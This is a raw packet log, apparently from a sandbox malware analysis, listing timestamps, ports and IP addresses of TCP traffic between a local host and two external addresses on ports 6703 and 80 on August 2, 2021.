                                Aug 2, 2021 11:00:29.294819117 CEST491686703192.168.2.22203.159.80.186
                                Aug 2, 2021 11:00:29.294912100 CEST670349168203.159.80.186192.168.2.22
                                Aug 2, 2021 11:00:29.294939995 CEST670349168203.159.80.186192.168.2.22
                                Aug 2, 2021 11:00:29.295048952 CEST491686703192.168.2.22203.159.80.186
                                Aug 2, 2021 11:00:29.295069933 CEST670349168203.159.80.186192.168.2.22
                                Aug 2, 2021 11:00:29.295110941 CEST670349168203.159.80.186192.168.2.22
                                Aug 2, 2021 11:00:29.295167923 CEST670349168203.159.80.186192.168.2.22
                                Aug 2, 2021 11:00:29.295277119 CEST670349168203.159.80.186192.168.2.22
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Aug 2, 2021 11:00:29.295336962 CEST  49168        6703       192.168.2.22    203.159.80.186
Aug 2, 2021 11:00:29.295345068 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.295473099 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.295598030 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.295655966 CEST  49168        6703       192.168.2.22    203.159.80.186
Aug 2, 2021 11:00:29.295733929 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.295922041 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.295979023 CEST  49168        6703       192.168.2.22    203.159.80.186
Aug 2, 2021 11:00:29.325413942 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.325443029 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.325455904 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.325469017 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.325485945 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.325503111 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.325551033 CEST  49168        6703       192.168.2.22    203.159.80.186
Aug 2, 2021 11:00:29.325582027 CEST  49168        6703       192.168.2.22    203.159.80.186
Aug 2, 2021 11:00:29.325640917 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.325659037 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.325676918 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.325692892 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.325710058 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.325728893 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.325746059 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.325763941 CEST  49168        6703       192.168.2.22    203.159.80.186
Aug 2, 2021 11:00:29.325767040 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.325768948 CEST  49168        6703       192.168.2.22    203.159.80.186
Aug 2, 2021 11:00:29.325787067 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.325803041 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.325822115 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.325839996 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.325867891 CEST  49168        6703       192.168.2.22    203.159.80.186
Aug 2, 2021 11:00:29.325874090 CEST  49168        6703       192.168.2.22    203.159.80.186
Aug 2, 2021 11:00:29.326164007 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.326183081 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.326203108 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.326220989 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.326236963 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.326252937 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.326266050 CEST  49168        6703       192.168.2.22    203.159.80.186
Aug 2, 2021 11:00:29.326270103 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.326270103 CEST  49168        6703       192.168.2.22    203.159.80.186
Aug 2, 2021 11:00:29.326287985 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.326304913 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.326322079 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.326356888 CEST  49168        6703       192.168.2.22    203.159.80.186
Aug 2, 2021 11:00:29.326364040 CEST  49168        6703       192.168.2.22    203.159.80.186
Aug 2, 2021 11:00:29.356925011 CEST  6703         49168      203.159.80.186  192.168.2.22
Aug 2, 2021 11:00:29.568089962 CEST  49168        6703       192.168.2.22    203.159.80.186
Aug 2, 2021 11:00:29.605072975 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.634754896 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.634917974 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.636285067 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.667159081 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.667186975 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.667202950 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.667218924 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.667237997 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.667260885 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.667263985 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.697216034 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.697247028 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.697258949 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.697280884 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.697299004 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.697319031 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.697339058 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.697351933 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.697381020 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.697407007 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.699093103 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.699110985 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.726705074 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.726732969 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.726749897 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.726763010 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.726778984 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.726792097 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.726794958 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.726811886 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.726814032 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.726824999 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.726830959 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.726835012 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.726854086 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.726866961 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.726891041 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.726895094 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.726918936 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.726922035 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.727072954 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.727663040 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.727937937 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.727958918 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.727977037 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.727993965 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.728012085 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.728024960 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.728064060 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.728076935 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.728080034 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.728564978 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.728574038 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.756551027 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.756582022 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.756598949 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.756618977 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.756639004 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.756654978 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.756674051 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.756681919 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.756690979 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.756705999 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.756711006 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.756711960 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.756731987 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.756748915 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.756757975 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.756763935 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.756767988 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.756769896 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.756772041 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.756783962 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.756789923 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.756807089 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.756823063 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.756840944 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.756851912 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.756864071 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.756880999 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.756896973 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.756896973 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.756901026 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.756903887 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.756906033 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.756906986 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.756920099 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.756922007 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.757095098 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.757116079 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.757133961 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.757138968 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.757145882 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.757153034 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.757169962 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.757170916 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.757175922 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.757188082 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.757200003 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.757204056 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.757205009 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.757220984 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.757235050 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.757236958 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.757240057 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.757252932 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.757296085 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.757299900 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.757415056 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.757431984 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.757467985 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.757472038 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.758764982 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.787513971 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.787549019 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.787570953 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.787615061 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.787617922 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.787637949 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.787642002 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.787646055 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.787657976 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.787666082 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.787677050 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.787693977 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.787698030 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.787702084 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.787714958 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.787731886 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.787733078 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.787736893 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.787755966 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.787769079 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.787775993 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.787775993 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.787796974 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.787810087 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.787813902 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.787815094 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.787832975 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.787849903 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.787851095 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.787856102 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.787880898 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.787899017 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.787904978 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.787910938 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.787923098 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.787941933 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.788033009 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.788038969 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.788042068 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.788043976 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.790173054 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.790193081 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.790219069 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.790235996 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.790242910 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.790254116 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.790268898 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.790273905 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.790273905 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.790292978 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.790312052 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.790328026 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.790349007 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.790349960 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.790354013 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.790358067 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.790365934 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.790376902 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.790381908 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.790385008 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.790404081 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.790420055 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.790422916 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.790426970 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.790440083 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.790441990 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.790458918 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.790477037 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.790486097 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.790491104 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.790494919 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.790513039 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.790518045 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.790522099 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.790530920 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.790549994 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.790559053 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.790565968 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.790569067 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.790570974 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.790589094 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.790591002 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.790606976 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.790622950 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.790633917 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.790637970 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.790642023 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.790659904 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.790663958 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.790668964 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.790677071 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.790695906 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.790700912 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.790940046 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.792841911 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.817256927 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.817291021 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.817303896 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.817316055 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.817327976 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.817341089 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.817353964 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.817365885 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.817992926 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.819904089 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.819930077 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.819942951 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.819962978 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.819982052 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.820003033 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.820022106 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.820040941 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.820049047 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.820060015 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.820077896 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.820081949 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.820082903 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.820086956 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.820090055 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.820101023 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.820116043 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.820121050 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.820122004 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.820138931 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.820550919 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.820564985 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.821903944 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.821926117 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.821938992 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.821953058 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.821969986 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.821989059 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.822005987 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.822007895 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.822026968 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.822029114 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.822031975 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.822035074 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.822050095 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.822067976 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.822071075 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.822073936 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.822091103 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.822104931 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.822108984 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.822109938 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.822128057 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.822138071 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.822144985 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.822149038 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.822169065 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.822185040 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.822185993 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.822191000 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.822202921 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.822216034 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.822221041 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.822226048 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.822247028 CEST  80           49169      203.159.80.165  192.168.2.22
Aug 2, 2021 11:00:29.822274923 CEST  49169        80         192.168.2.22    203.159.80.165
Aug 2, 2021 11:00:29.822278023 CEST  80           49169      203.159.80.165  192.168.2.22
